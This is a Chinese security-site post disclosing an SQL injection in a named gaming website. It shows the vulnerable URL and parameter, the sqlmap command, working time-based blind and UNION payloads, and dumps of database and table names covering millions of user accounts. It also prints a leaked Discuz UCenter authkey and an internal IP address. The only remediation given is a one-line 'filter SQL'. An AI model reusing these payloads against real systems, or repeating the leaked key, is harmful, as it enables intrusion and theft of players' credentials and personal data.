首页 > 网络安全频道 > 网站安全 > 正文
游戏安全之欢畅游戏官网SQL注入/涉及600万玩家手机邮箱帐号密码安全
2016-07-12     我来说两句       作者:黑帽网
   我要投稿

shell不了好悲伤

在登录游戏的时候有注入点,UNION
 

http://long.gamebean.com/game_enter.php?s_id=1


跑sqlmap
 

sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs         _ ___ ___| |_____ ___ ___  {1.0.4.4#dev}|_ -| . | |     | .'| . ||___|_  |_|_|_|_|__,|  _|      |_|           |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 09:59:19[09:59:19] [INFO] resuming back-end DBMS 'mysql' [09:59:20] [INFO] testing connection to the target URLsqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: s_id (GET)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- ----[09:59:23] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.10, Nginxback-end DBMS: MySQL 5.0.12[09:59:23] [INFO] fetching database names[09:59:23] [INFO] the SQL query used returns 24 entriesavailable databases [24]:                                                                                                                                                           [*] analyze[*] android[*] bbs[*] cjsh_user[*] cms[*] dx[*] football[*] game_stat[*] gcenter[*] gs[*] information_schema[*] lt_wap[*] mis[*] mysql[*] ourpalm[*] ssfee_platform[*] ssfee_platform_test[*] test[*] test_channel[*] union[*] user[*] user2406[*] webpay[*] yjws



涉及全站24个库

其中bbs库和user库和ssfee_platform平台库里面有200W+450W+560W用户帐号密码手机邮箱信息,去重后大约有600W用户
 

Database: bbs+----------------------+---------+| Table                | Entries |+----------------------+---------+| uc_memberfields      | 1980846 || uc_members           | 1980846 || cdb_favoritethreads  | 46470   || cdb_prompt           | 21412   || cdb_memberfields     | 18489   || cdb_members          | 18488   || cdb_posts            | 9945    || cdb_onlinetime       | 8183    || cdb_threads          | 3357    || uchome_creditlog     | 1660    || cdb_promptmsgs       | 1321    || uchome_pic           | 1320    || uchome_tagblog       | 1118    || uc_pms               | 1095    || cdb_threadsmod       | 709     || cdb_modworks         | 666     || cdb_rsscaches        | 651     || uchome_blog          | 502     || uchome_blogfield     | 502     || uchome_member        | 483     || uchome_space         | 483     || uchome_spacefield    | 483     || uchome_album         | 464     || uchome_feed          | 425     || cdb_threadtags       | 340     || uchome_spaceinfo     | 320     || cdb_stylevars        | 282     || uchome_stat          | 245     || cdb_settings         | 244     || cdb_tags             | 243     || uchome_tag           | 209     || uchome_friend        | 126     || uchome_usertask      | 96      || cdb_smilies          | 80      || cdb_statvars         | 73      || uc_newpm             | 66      || cdb_typeoptions      | 65      || uchome_notification  | 65      || uchome_config        | 64      || uchome_comment       | 62      || cdb_forumfields      | 55      || cdb_forums           | 55      || cdb_stats            | 52      || uchome_creditrule    | 47      || cdb_spacecaches      | 42      || cdb_caches           | 41      || uc_notelist          | 38      || cdb_faqs             | 34      || uchome_visitor       | 32      || cdb_request          | 30      || uc_friends           | 29      || cdb_debateposts      | 28      || cdb_favorites        | 28      || cdb_favoriteforums   | 25      || uchome_magic         | 25      || cdb_magiclog         | 24      || uc_settings          | 24      || uchome_doing         | 24      || uchome_magicstore    | 24      || uchome_poke          | 22      || uchome_magicinlog    | 21      || uchome_post          | 21      || uchome_usermagic     | 21      || uchome_polloption    | 20      || uchome_thread        | 20      || cdb_usergroups       | 19      || cdb_failedlogins     | 18      || uchome_share         | 18      || cdb_moderators       | 17      || uchome_click         | 15      || cdb_ratelog          | 14      || cdb_taskvars         | 14      || cdb_crons            | 12      || cdb_forumlinks       | 12      || cdb_magics           | 12      || cdb_projects         | 11      || cdb_reportlog        | 11      || uchome_magicuselog   | 10      || cdb_words            | 9       || uchome_usergroup     | 9       || cdb_admingroups      | 7       || cdb_polloptions      | 7       || cdb_tasks            | 7       || uchome_task          | 7       || cdb_access           | 6       || cdb_feeds            | 6       || cdb_prompttype       | 6       || cdb_styles           | 6       || cdb_templates        | 6       || uchome_eventclass    | 6       || uchome_mtag          | 6       || uchome_polluser      | 6       || uchome_tagspace      | 6       || cdb_attachments      | 5       || cdb_navs             | 5       || cdb_ranks            | 5       || uchome_cron          | 5       || cdb_admincustom      | 4       || cdb_bbcodes          | 4       || cdb_onlinelist       | 4       || cdb_searchindex      | 4       || cdb_typemodels       | 4       || uchome_data          | 4       || uchome_poll          | 4       || uchome_pollfield     | 4       || cdb_imagetypes       | 3       || cdb_warnings         | 3       || uc_applications      | 3       || uchome_class         | 3       || uchome_profield      | 3       || uchome_report        | 3       || uchome_statuser      | 3       || cdb_addons           | 2       || cdb_debates          | 2       || cdb_polls            | 2       || cdb_adminactions     | 1       || cdb_adminsessions    | 1       || cdb_attachmentfields | 1       || uc_admins            | 1       || uc_failedlogins      | 1       || uc_protectedmembers  | 1       |+----------------------+---------+
Database: user+--------------------+---------+| Table              | Entries |+--------------------+---------+| channel_extend     | 12501938 || members_info       | 4550839 || members_0          | 650074  || members_6          | 648069  || members_4          | 647573  || members_8          | 646946  || members_2          | 646486  || members_7          | 640523  || members_5          | 640124  || members_3          | 638772  || members_1          | 638475  || members_9          | 638271  || members_football   | 66598   || membersinfo_0      | 29646   || membersinfo_6      | 29350   || membersinfo_4      | 29293   || membersinfo_5      | 29186   || membersinfo_2      | 29133   || membersinfo_8      | 29063   || membersinfo_3      | 28919   || membersinfo_7      | 28804   || membersinfo_1      | 28781   || membersinfo_9      | 28705   || footballuser_copy1 | 21563   || members_point      | 20073   || members_fmworlds   | 5047    || zq_point           | 2703    || a                  | 1355    || footballuser       | 1000    || invite             | 25      || partner            | 11      |+--------------------+---------+
Database: ssfee_platform+-------------------------------+---------+| Table                         | Entries |+-------------------------------+---------+| p_user_ip                     | 6538408 || user_info_201112              | 5643243 || user_info                     | 3971775 || p_area                        | 2869631 || advt_stat_hour_201201TO06     | 2474046 || user_info_201102              | 2234956 || register_after                | 1738043 || advt_stat_hour                | 1559224 || advt_stat_channel             | 1082289 || advt_stat_hour_201101TO07     | 1069454 || u_ip                          | 376052  || advt_stat_hour_201101TO02     | 344281  || jiaose_sssg                   | 186520  || temp4                         | 139504  || advt_stat_ye                  | 117002  || advt_stat_hour_20108TO10      | 101229  || p_area_Integration            | 57078   || temp2                         | 56822   || p_newsbase_201206             | 49845   || p_ip                          | 45309   || advt_stat_nq                  | 43122   || p_area_Integration_ip         | 25881   || seek_gateway_fee              | 24020   || p_area_register               | 21292   || seek_gateway_fee_bak          | 19978   || wapgame_zhuce                 | 19034   || jiaose_long                   | 16060   || user_info_mj                  | 11834   || sms_fee                       | 7404    || temp3                         | 4679    || get_user                      | 4035    || wapgame_fee                   | 3921    || wapgame_fee_bak               | 3626    || p_newsbase_tmp                | 3421    || pc_jiaose                     | 3134    || user_stat                     | 2809    || p_ad_info                     | 2590    || seek_gateway_chengben         | 2381    || seek_gateway_chengben_bak     | 2368    || p_user_ip_copy                | 2355    || wapgame_fee_201109            | 2355    || sms_fee1                      | 1772    || jiaose_yan                    | 1096    || p_newscontent                 | 966     || wapgame_zhuce_tmp             | 927     || p_ad                          | 895     || p_area_Integration_copy       | 742     || lm_info                       | 704     || p_newsbase                    | 665     || haoduan_ds                    | 345     || bd                            | 295     || bd2                           | 295     || lm_info_test                  | 288     || netgame_stat                  | 243     || temp                          | 216     || seek_gateway_fee_tmp1         | 154     || p_area_Integration_ip_copy2   | 132     || p_area_Integration_ip_copy1   | 118     || p_area_Integration_ip_ddd     | 118     || p_area_Integration_test_copy1 | 116     || baidu                         | 112     || wapgame_fee_tmp               | 101     || p_user_ip_are                 | 99      || seek_gateway_fee_g9           | 92      || kuapintai_fee                 | 91      || jiaose_ly                     | 70      || u_manage                      | 68      || advt_stat_tmp                 | 62      || seek_gateway_fee_tmp          | 62      || seek_gateway_fee_lr           | 60      || u_admin                       | 60      || netgame_stat_tmp              | 49      || sms_fee2                      | 48      || p_area_Integration_ip_copy    | 36      || sms_fee3                      | 24      || seek_gateway_chengben_lr      | 17      || u_group                       | 15      || seek_gateway_chengben_tmp     | 14      || wapgame_fee_bf2015            | 12      || p_user_ip_tmp                 | 10      || data_manage                   | 9       || p_newsclass                   | 9       || wapgame_qudao                 | 9       || p_admin                       | 6       || p_area_Integration_test_copy  | 6       || seek_gateway_xz               | 6       || data_admin                    | 4       || jiaose_djh                    | 4       || yuan                          | 4       || data_group                    | 2       || p_adver_admin                 | 2       || ios_xml                       | 1       || p_config                      | 1       |+-------------------------------+---------+



以及泄漏discuz的uckey
 

Database: bbsTable: uc_applications[3 entries]+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| appid | ip      | url                       | name       | type   | extra                       | charset | authkey                                                          | recvnote | synlogin | dbcharset | viewprourl | apifilename | tagtemplates                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| 1     |  | http://219.232.240.2/home | 个人家园       | UCHOME |                      | utf-8   | F0q1C5wclbJcieF6i6F03d3eDd37V4K10aG6y5I7qeEd97mcN3b3t43a21UfGai6 | 1        | 1        | utf8      |     | uc.php      | /r/n/r/n 

解决方案:

过滤sql

点击收藏到自己的收藏夹!回本站首页
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:三個白帽-条条大路通罗马系列2-Writeup
下一篇:优酷多个分站存在SSRF漏洞大礼包
相关文章
图文推荐
排行
热门
网站
工具
无线
关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训
版权所有: 中国黑帽网--致力于做最好的网络安全技术学习网站 。